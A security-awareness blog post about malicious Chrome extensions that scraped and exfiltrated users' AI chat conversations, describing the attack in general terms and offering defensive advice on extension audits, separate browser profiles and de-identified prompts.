Press ESC to close

Malicious Chrome Extensions Steal AI Chats: How to Protect Your Conversations in 2026

Almost 900,000 people had their private AI conversations silently stolen by fake Chrome extensions that looked like normal AI assistant tools. If you depend on AI for work, research, or coding, this is not just a tech story—it is a direct security and privacy issue.

AI chat security is now a core part of AI productivity tools, especially for professionals in Canada and worldwide who use platforms like ChatGPT, DeepSeek, and Perplexity every day. This guide explains what happened, why it matters, and how to build safer AI workflows using usebetterai.com-style practices.


What Happened in the 900K AI Chat Theft Campaign?

Two malicious Chrome extensions pretended to be legitimate AI assistant tools and quietly stole users’ AI conversations and browsing data. They targeted popular AI platforms, including ChatGPT and DeepSeek, and even appeared trustworthy inside the Chrome Web Store.

  • The campaign was discovered by OX Security’s research team in late 2025.

  • The fake extensions mimicked AITOPIA, a real AI sidebar extension, copying its interface and behavior.

  • Once installed, they scraped AI chats directly from the browser and sent the data to attacker-controlled servers every 30 minutes.

The Featured Extension Problem

One of the malicious extensions carried Google’s “Featured” badge, which usually signals that an extension follows security and UX best practices. This made it look especially safe to non-technical users.

  • The two identified rogue extensions together had over 900,000 downloads.

  • OX Security reported them to Google on December 29, 2025, but they remained available at least through December 30.

This shows that even “Featured” or “Recommended” browser extensions cannot be assumed safe when handling sensitive AI content.


How These Malicious AI Extensions Actually Work

To protect yourself, it helps to understand how these extensions steal data under the hood. The techniques used in this campaign are becoming common in AI-related malware.

Step-by-Step: From Install to Exfiltration

Once a user installs one of these malicious extensions, a predictable chain of events follows.

  1. Unique tracking ID created

    • The extension assigns a unique user ID and starts tracking your browsing sessions.

  2. Monitoring your tabs and URLs

    • Using Chrome’s tabs APIs, the extension watches when you open ChatGPT, DeepSeek, or other AI tools.

    • It also collects active tab URLs, exposing your research topics, internal tools, and sometimes query parameters.

  3. Scraping AI conversations from the DOM

    • When you are on an AI chat page, the extension reads the Document Object Model (DOM) and pulls both your prompts and the AI responses.

    • This can include confidential project details, source code, clinical notes, or internal company plans.

  4. Encoding and sending the data out

    • The stolen data is encoded in Base64 and sent to command-and-control servers such as deepaichats[.]com and chatsaigpt[.]com.

    • Uploads are batched and sent roughly every 30 minutes to hide in normal traffic patterns.

  5. Silent updates keep the attack alive

    • Extensions can receive automatic updates that add or change malicious behavior without any user approval.

    • This “sleeper agent” pattern lets a harmless extension turn dangerous months later.

Why AI Conversations Are a Goldmine

For attackers, AI chats are rich, structured data. They can include:

  • Product roadmaps, business strategies, or customer data.

  • Source code and internal architecture details from developers.

  • Clinical summaries or protocol-related notes from research staff (even if de-identified).

The value of these chats makes them a prime target in 2026’s AI cybersecurity landscape.


The 900,000-user campaign is part of a wider pattern: browser extensions marketed as “privacy tools” or “productivity tools” quietly logging AI conversations at scale.

The Free VPN and “Privacy” Extension Problem

In December 2025, Koi Security revealed that several free VPN and privacy-related Chrome and Edge extensions with more than 8 million downloads were capturing AI conversations.

  • Extensions like Urban VPN Proxy and related tools intercepted conversations from ChatGPT, Claude, Gemini, Copilot, Perplexity, DeepSeek, Grok, and other AI platforms.

  • JavaScript code embedded in these extensions overrode core browser functions like fetch() and XMLHttpRequest, allowing real-time interception of user inputs and AI responses.

  • Some of these were also labeled as “Featured” on the browser extension stores.

Users often installed these extensions to increase privacy, but instead their AI conversations were monetized and logged without clear consent.

Enterprise Extension Risk: 99% Usage, 53% High-Risk Permissions

An enterprise browser extension security report in 2025 found:

  • 99% of enterprise users have at least one browser extension installed.

  • Over half run more than 10 extensions at the same time.

  • 53% of users have at least one extension with “high” or “critical” permission scopes, able to access cookies, passwords, browsing data, and full page contents.

For organizations that embrace AI-powered productivity—from clinical research sites to software teams—this means nearly every employee represents a potential attack vector via browser extensions.


Why This Matters for Professionals Using AI Every Day

If you are a web developer, clinical researcher, or knowledge worker using AI as a core tool, these attacks are not abstract. They directly affect your work, compliance obligations, and, in some cases, patient or client confidentiality.

High-Risk Use Cases

You are especially at risk if you:

  • Paste internal code, credentials, or infrastructure details into ChatGPT, DeepSeek, or Perplexity.

  • Summarize internal SOPs, study protocols, or regulatory documents inside AI tools.

  • Use AI to draft agreements, HR decisions, or sensitive corporate communications.

When malicious extensions scrape AI conversations, they gain:

  • Internal naming conventions, URLs, and system structures.

  • Business strategy and research plans.

  • Potentially identifiable fragments that, when combined, may violate contracts or regulations.

As AI becomes a core productivity layer in 2026, attackers are following the data.


Practical AI Security Workflow: How to Use AI Safely in 2026

To outperform simple news coverage, this section focuses on actionable workflows you can adopt to keep enjoying AI productivity tools without exposing your organization.

Step 1: Lock Down Your Browser Extensions

Start by treating extensions as untrusted code that runs in your browser.

1. Audit all installed extensions (monthly)

  • Go to chrome://extensions (or your browser’s equivalent).

  • For each extension, ask:

    • Do you still actively use it?

    • Is it from a well-known, accountable publisher?

    • Does it really need access to “All sites” or “Read and change data on every website you visit”?

Remove anything you do not recognize or genuinely need.

2. Adopt a “zero-extension” baseline for AI work

  • Use a separate browser profile (or separate browser) used only for:

    • ChatGPT

    • DeepSeek

    • Perplexity

    • Other AI tools

  • In that profile, keep extensions to the absolute minimum (ideally none except a password manager).

This simple separation dramatically reduces the chance that a malicious extension can see your AI conversations.

Step 2: Segment Sensitive and Non-Sensitive AI Use

Design your AI productivity workflow so that the most sensitive information never touches general-purpose AI chats.

Create three buckets for your prompts:

  1. Public or low-risk

    • Generic marketing copy, public documentation, or learning questions.

    • Safe to use in normal AI tools.

  2. Internal but non-regulated

    • Internal process notes, pseudonymized analytics, architecture ideas.

    • Use only from a hardened browser profile with no risky extensions.

  3. Regulated or highly confidential

    • Patient-related clinical information, confidential contracts, strategic M&A plans.

    • Only use in environments with enterprise-grade AI governance or on-prem solutions; avoid consumer browser-chat flows entirely.

Mapping your prompts into these buckets becomes a simple checklist habit and greatly reduces exposure if an extension is compromised.

Step 3: Build Safer AI Prompts and Workflows

Even when your browser is clean, you can make your AI prompts safer and more robust. This also improves outcomes in AI search and AI assistance platforms such as “perplexity discover ai search” or other answer engines.

Safer prompt-writing habits:

  • Strip identifiers: Remove names, IDs, URLs, and client-specific details whenever the context allows.

  • Use placeholders: Write “Hospital A,” “Study X,” or “Client Y” instead of real names.

  • Avoid secrets: Never paste API keys, SSH keys, or full database connection strings.

Example (developer):

  • Unsafe: “Here’s our production .env file. Why is the app crashing?”

  • Safer: “Here is a sample .env with redacted values and the stack trace. What are common causes of this error in Laravel?”

Example (clinical researcher):

  • Unsafe: “Patient #123 with lung cancer had X mutation and Y AE. How should the oncologist respond?”

  • Safer: “A patient in a phase 2 oncology trial with an EGFR mutation developed grade 3 rash after treatment with a TKI. What are guideline-backed management options for these AEs?”

These workflows keep AI productivity high while limiting damage if browser data is ever leaked.


2026 Predictions: The Next Wave of AI + Browser Threats

Beyond what has already happened, several trends are likely to shape AI security and multi-agent AI 2026 workflows.

Prediction 1: More AI-Specific Malware in Extensions

Attackers now understand that AI conversations are high-value, structured intelligence. Expect:

  • Extensions that target specific AI domains (coding assistants, medical literature summarizers, legal drafting tools).

  • Multi-platform injectors that monitor not just ChatGPT and DeepSeek, but also specialized tools embedded inside EMRs, IDEs, and SaaS dashboards.cyberinsider

Prediction 2: Enterprise “AI Browser” and Policy Controls

Vendors are already pushing secure enterprise browsers and AI policy layers. In 2026, more organizations will:globenewswire

  • Whitelist only approved extensions.

  • Enforce AI usage policies at the browser level (e.g., blocking copy-paste of certain data types into public AI tools).

  • Log and monitor AI interactions centrally for compliance.

Prediction 3: Answer-Engine SEO Meets Security

As AI-first search engines (similar to Perplexity Discover AI search) grow, security-conscious content will rank better. High-performing content will:techmagnate

  • Blend AI productivity tips with concrete security and compliance practices.

  • Show transparent E-E-A-T signals (experience, expertise, author identity, and trusted sources).

  • Provide structured FAQs and step-by-step workflows that AI models can easily surface and reuse.

Sites like usebetterai.com can stand out by pairing AI efficiency with practical AI security frameworks—not just generic prompt lists.

 Malicious Chrome Extensions and AI Conversations

1. Can a browser extension really read my AI chats?

Yes. If an extension has permissions to “Read and change data on all websites,” it can see the contents of the pages you open, including AI conversations.

2. Does a “Featured” or “Recommended” badge mean an extension is safe?

No. In recent cases, malicious or highly invasive extensions have still carried “Featured” badges on Chrome and Edge stores. Treat badges as a signal—not a guarantee.

3. How do I know if my conversations were stolen?

In most cases, you cannot easily see what data was exfiltrated. If you installed one of the reported extensions, assume your AI chats and URLs may have been exposed and:

  • Remove the extension.

  • Rotate any credentials or secrets you pasted into chats.

  • Notify your security or compliance team if you handled sensitive data.

4. Are AI platforms like ChatGPT or DeepSeek themselves unsafe?

The recent incidents targeted the browser environment, not the AI providers’ core infrastructure. However, treating all AI chats as potentially sensitive is still wise, especially for enterprise or regulated work.malwarebytes

5. What is the safest way to keep using AI for work?

  • Minimize extensions in the browser you use for AI.

  • Separate high-risk and low-risk AI use cases.

  • Avoid sharing secrets or regulated data with general-purpose AI tools.

  • Use enterprise AI solutions when working with sensitive or regulated information.


Build a Safer AI Stack Before the Next Wave Hits

Attackers are now targeting AI conversations at scale, and the 900,000-user Chrome extension campaign is likely just the beginning. Instead of avoiding AI, the smarter move is to upgrade how you use it.

  • Audit your extensions this week and create a clean AI-only browser profile.

  • Redesign your prompts around de-identification and secure workflows.

  • Explore usebetterai-style tools and guides that combine AI productivity with practical security patterns tailored to your role.

The professionals and teams who master both AI speed and AI safety will move faster than competitors—without bleeding sensitive data into rogue extensions and shadow data markets.

Related Posts

Meta Acquires Manus: What This AI Deal Means for Everyday Users
Google’s Free Gemini for Education Is Changing Classrooms Everywhere
OpenAI's AI Pen with Jony Ive: A Simple 2026 Update for Everyday Users
How AI World Models Are Changing Video Games (and Why Some Workers Are Worried)
Jordan M.

Jordan M. focuses on how AI tools fit into real workflows and daily routines. With a strong interest in usability and productivity, Jordan helps break down complex tools into simple, actionable guidance. His goal is to make AI feel accessible, efficient, and worth using for beginners and professionals alike.

Your experience on this site will be improved by allowing cookies.